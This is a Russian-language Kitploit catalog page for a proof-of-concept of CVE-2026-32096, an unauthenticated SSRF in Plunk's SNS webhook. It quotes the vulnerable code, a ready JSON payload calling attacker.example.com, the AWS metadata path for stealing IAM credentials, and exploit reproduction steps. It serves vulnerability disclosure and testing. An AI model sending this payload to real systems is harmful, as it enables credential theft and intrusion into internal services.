Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-32096 — Доказательство концепции эксплуатации уязвимости SSRF в SNS-вебхуке Plunk, демонстрирующее неаутентифицированную подделку серверных запросов через непроверенный SubscribeURL. | Kitploit
Инструменты/GitHubGitHub/andrebhu/cve-2026-32096
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubandrebhu/cve-2026-32096

CVE-2026-32096

Доказательство концепции эксплуатации уязвимости SSRF в SNS-вебхуке Plunk, демонстрирующее неаутентифицированную подделку серверных запросов через непроверенный SubscribeURL.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-32096

SSRF через непроверенное подтверждение подписки AWS SNS в useplunk/plunk

Краткое описание

Конечная точка API Plunk POST /webhooks/sns загружает предоставленный атакующим SubscribeURL без проверки криптографической подписи AWS SNS. Неаутентифицированный атакующий может заставить сервер выполнять произвольные исходящие HTTP-запросы (SSRF).

СерьёзностьКритическая — CVSS 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)
CWECWE-918: Подделка серверных запросов
Затронутый файлapps/api/src/controllers/Webhooks.ts
Требуется аутентификацияНет

Уязвимый код

root@kitploit:~
// apps/api/src/controllers/Webhooks.ts
if (req.body.Type === 'SubscriptionConfirmation') {
  const confirmResponse = await fetch(req.body.SubscribeURL); // SSRF — нет проверки подписи
  if (confirmResponse.ok) {
    return res.status(200).json({ success: true, message: 'Subscription confirmed' });
  }
}

Минимальная полезная нагрузка состоит всего из двух полей:

root@kitploit:~
{
  "Type": "SubscriptionConfirmation",
  "SubscribeURL": "http://attacker.example.com/callback"
}

Воздействие

  • AWS EC2/ECS: Кража учётных данных IAM через http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Внутренние сервисы: Доступ к базам данных, Redis, API Kubernetes или другим сервисам, не доступным из интернета
  • Сканирование портов: Перечисление внутренних портов с помощью анализа времени ответа и ошибок

Воспроизведение

Предварительные требования

  • Docker и Docker Compose
  • Python 3

Шаги

  1. Запустите тестовое окружение Plunk:

    root@kitploit:~
    docker compose up -d
    
  2. Запустите прослушиватель обратного вызова SSRF:

    root@kitploit:~
    python3 listener.py
    
  3. Запустите эксплойт:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  4. Наблюдайте обратный вызов в выводе listener.py, подтверждающий, что сервер загрузил управляемый атакующим URL.

Файлы

ФайлОписание
exploit.shСкрипт эксплойта «под ключ» — отправляет подделанную полезную нагрузку SNS на уязвимую конечную точку
listener.pyПрослушиватель обратного вызова SSRF — перехватывает и регистрирует входящие запросы от сервера Plunk
docker-compose.ymlМинимальное окружение Docker Compose (Postgres, Redis, Plunk) для локального воспроизведения

Ссылки

  • AWS SNS: Проверка подписей сообщений Amazon SNS
  • OWASP SSRF Prevention Cheat Sheet
Скачать инструмент